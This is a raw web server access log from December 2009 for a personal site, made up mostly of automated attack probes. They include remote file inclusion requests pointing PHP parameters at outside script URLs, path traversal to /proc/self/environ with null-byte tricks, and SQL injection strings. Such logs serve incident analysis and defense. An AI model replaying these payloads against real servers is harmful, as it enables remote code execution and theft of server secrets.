83.145.229.6 - - [13/Dec/2009:12:57:57 -0800] "GET /logs/access_090616.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:57 -0800] "GET /logs/access_090616.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:57 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:57 -0800] "GET /logs/access_090511.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:57 -0800] "GET /logs/access_090616.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:57 -0800] "GET /logs/access_090511.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:57 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:58 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:58 -0800] "GET /logs/access_090511.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:58 -0800] "GET /errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
83.145.229.6 - - [13/Dec/2009:12:57:58 -0800] "GET /logs/access_090511.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:58:44 -0800] "GET /logs//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:58:44 -0800] "GET /logs/access_090727.log%20%20//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:58:48 -0800] "GET /index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 14852 "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:59:09 -0800] "GET /logs//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:59:09 -0800] "GET /logs/access_090727.log%20%20//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:59:10 -0800] "GET /index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 14852 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:59:24 -0800] "GET /becommunity/community/index.php?pageurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:59:24 -0800] "GET /logs/access_080724.log/becommunity/community/index.php?pageurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:59:24 -0800] "GET /logs/becommunity/community/index.php?pageurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:59:28 -0800] "GET /becommunity/community/index.php?pageurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:59:28 -0800] "GET /logs/becommunity/community/index.php?pageurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:59:28 -0800] "GET /logs/access_080724.log%20%20/becommunity/community/index.php?pageurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:59:29 -0800] "GET /logs/access_080526.log/becommunity/community/index.php?pageurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:12:59:33 -0800] "GET /logs/access_080526.log%20%20/becommunity/community/index.php?pageurl=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:12:59:44 -0800] "GET /logs/access_081224.log%20%20//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:59:59 -0800] "GET /logs/access_090729.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:59:59 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:00:01 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:13:00:01 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:13:00:01 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:13:00:01 -0800] "GET /logs/access_090516.log/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:13:00:01 -0800] "GET /lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:00:04 -0800] "GET /logs/access_090816.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:13:00:05 -0800] "GET /logs/access_081224.log%20%20//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
96.31.202.173 - - [13/Dec/2009:13:00:25 -0800] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.motocampers.com/forums/showthread.php?t=2341" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3)" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:00:44 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:00:44 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:00:44 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:00:46 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:00:46 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:00:46 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:01:19 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:01:28 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:01:48 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:01:48 -0800] "GET /class/class.dashboard_cms.php?where_framework=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:01:48 -0800] "GET /class/class.dashboard_cms.php?where_framework=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:01:48 -0800] "GET /logs/access_090723.log%20%20//class/class.dashboard_cms.php?where_framework=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:01:48 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:01:48 -0800] "GET /logs/access_090227.log%20%20//class/class.dashboard_cms.php?where_framework=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:01:48 -0800] "GET /logs/access_090723.log%20%20//class/class.dashboard_cms.php?where_framework=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:13:01:48 -0800] "GET /logs/access_090227.log%20%20//class/class.dashboard_cms.php?where_framework=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:02:03 -0800] "GET /class/class.dashboard_cms.php?where_framework=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:02:04 -0800] "GET /logs/access_090723.log%20%20//class/class.dashboard_cms.php?where_framework=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:02:05 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:02:07 -0800] "GET /logs/access_090227.log%20%20//class/class.dashboard_cms.php?where_framework=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:02:15 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:02:26 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:02:28 -0800] "GET /class/class.dashboard_cms.php?where_framework=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:02:28 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:02:28 -0800] "GET /logs/access_090723.log%20%20//class/class.dashboard_cms.php?where_framework=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:02:30 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.160.17.200 - - [13/Dec/2009:13:02:38 -0800] "GET /logs/access_090227.log%20%20//class/class.dashboard_cms.php?where_framework=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:02:41 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
206.168.219.110 - - [13/Dec/2009:13:03:15 -0800] "GET /logs/access_080410.log/span%3Espanclass=77+and(select+count(*)+from+Pablin77)-- HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:03:50 -0800] "GET /logs/access_090925.log%20%20//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:03:50 -0800] "GET /logs/access_090704.log%20%20//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:03:53 -0800] "GET /logs/access_090925.log%20%20//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:03:53 -0800] "GET /logs/access_090704.log%20%20//skin/zero_vote/error.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:04:01 -0800] "GET /logs/access_090729.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:17 -0800] "GET /login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:17 -0800] "GET /logs/access_080222.log//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:17 -0800] "GET /logs//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:17 -0800] "GET /logs/access_080222.log//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:17 -0800] "GET /logs//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:17 -0800] "GET /login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:17 -0800] "GET /logs/access_090408.log//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:18 -0800] "GET /logs/access_090408.log//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:04:27 -0800] "GET /logs/access_090816.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.237.150.116 - - [13/Dec/2009:13:04:47 -0800] "GET /logs/ HTTP/1.0" 200 130048 "-" "Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:48 -0800] "GET /logs/access_080222.log%20%20//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:48 -0800] "GET /logs/access_090408.log%20%20//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.237.150.118 - - [13/Dec/2009:13:04:55 -0800] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:13:04:56 -0800] "GET /logs/access_090727.log//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:57 -0800] "GET /logs/access_080222.log%20%20//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:13:04:57 -0800] "GET /logs/access_090408.log%20%20//login.php?dir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
206.168.219.110 - - [13/Dec/2009:13:05:01 -0800] "GET /logs/access_080319.log/span%3Espanclass=77+and(select+count(*)+from+Pablin77)-- HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:13:05:06 -0800] "GET /logs/access_090727.log//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:13:05:09 -0800] "GET /logs/access_081224.log//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.205.252.4 - - [13/Dec/2009:13:05:17 -0800] "GET /logs/access_081224.log//index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:06:43 -0800] "GET /logs/access_081015.log/index2.php?page=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:06:43 -0800] "GET /index2.php?page=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:06:43 -0800] "GET /logs/access_081015.log/index2.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:06:43 -0800] "GET /logs/access_081015.log/index2.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:06:43 -0800] "GET /index2.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:06:43 -0800] "GET /logs/access_081015.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:06:43 -0800] "GET /index2.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:06:43 -0800] "GET /errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
78.251.221.15 - - [13/Dec/2009:13:07:37 -0800] "GET /logs/access_080924.log HTTP/1.1" 200 1507328 "http://www.google.ru/url?sa=t&source=web&ct=res&cd=10&ved=0CDIQFjAJ&url=http%3A%2F%2Fwww.dmulk.com%2Flogs%2Faccess_080924.log&rct=j&q=200.69.219.137&ei=9FYlS4fmIsa8jAeR063hBw&usg=AFQjCNG1fn9SJ1t_mZ_KpYRvRSABUCSj8g&sig2=--5bL-TsyTxTWs1JIdaQzw" "Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.14) Gecko/20080612 Fedora/2.0.0.14-20080612.fc8.acer Firefox/2.0.0.14" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:08:05 -0800] "GET /logs/access_090520.log/index2.php?page=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:08:05 -0800] "GET /logs/access_090520.log/index2.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:08:05 -0800] "GET /logs/access_090520.log/index2.php?page=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:13:08:05 -0800] "GET /logs/access_090520.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:09:44 -0800] "GET /logs/access_090407.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:09:44 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:09:44 -0800] "GET /logs/access_090402.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:13:09:47 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
